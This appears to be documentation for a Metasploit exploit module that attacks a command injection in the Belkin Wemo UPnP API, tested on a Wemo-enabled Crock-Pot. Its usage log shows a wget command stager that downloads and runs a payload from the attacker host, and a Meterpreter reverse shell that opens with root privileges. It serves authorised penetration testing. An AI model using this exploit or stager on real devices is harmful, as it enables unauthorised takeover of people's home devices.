William Vu
2.0 KiB
2.0 KiB
Intro
This module exploits a command injection in the Belkin Wemo UPnP API via
the SmartDevURL argument to the SetSmartDevInfo action.
This module has been tested on a Wemo-enabled Crock-Pot, but other Wemo
devices are known to be affected, albeit on a different RPORT (49153).
Setup
You may buy the device on Amazon at https://www.amazon.com/dp/B00IPEO02C/.
Targets
Id Name
-- ----
0 Unix In-Memory
1 Linux Dropper
Options
RPORT
Set this to the Wemo device's UPnP port. In our testing, this was 49152 for Crock-Pot and 49153 for other devices.
Usage
msf5 exploit(linux/upnp/belkin_wemo_upnp_exec) > run
[*] Started reverse TCP handler on 10.22.22.4:4444
[+] Wemo-enabled device detected
[*] Found firmware version: 2.00.6461
[+] Firmware version 2.00.6461 < 2.00.8643
[*] 10.22.22.1:49152 - The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/CKgRyLqQZtBY6
[*] Local IP: http://[redacted]:8080/CKgRyLqQZtBY6
[*] Generated command stager: ["wget -qO /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P http://10.22.22.4:8080/CKgRyLqQZtBY6", "chmod +x /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P", "/tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P", "rm -f /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P"]
[*] Regenerated command stager: cp /bin/sh /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P;wget -qO /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P http://10.22.22.4:8080/CKgRyLqQZtBY6;/tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P;rm -f /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P
[*] Client 10.22.22.1 (Wget) requested /CKgRyLqQZtBY6
[*] Sending payload to 10.22.22.1 (Wget)
[*] Transmitting intermediate stager...(164 bytes)
[*] Sending stage (1252312 bytes) to 10.22.22.1
[*] Meterpreter session 1 opened (10.22.22.4:4444 -> 10.22.22.1:4607) at 2019-02-12 14:37:37 -0600
[*] Server stopped.
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer : 10.22.22.1
OS : (Linux 2.6.21)
Architecture : mips
BuildTuple : mipsel-linux-muslsf
Meterpreter : mipsle/linux
meterpreter >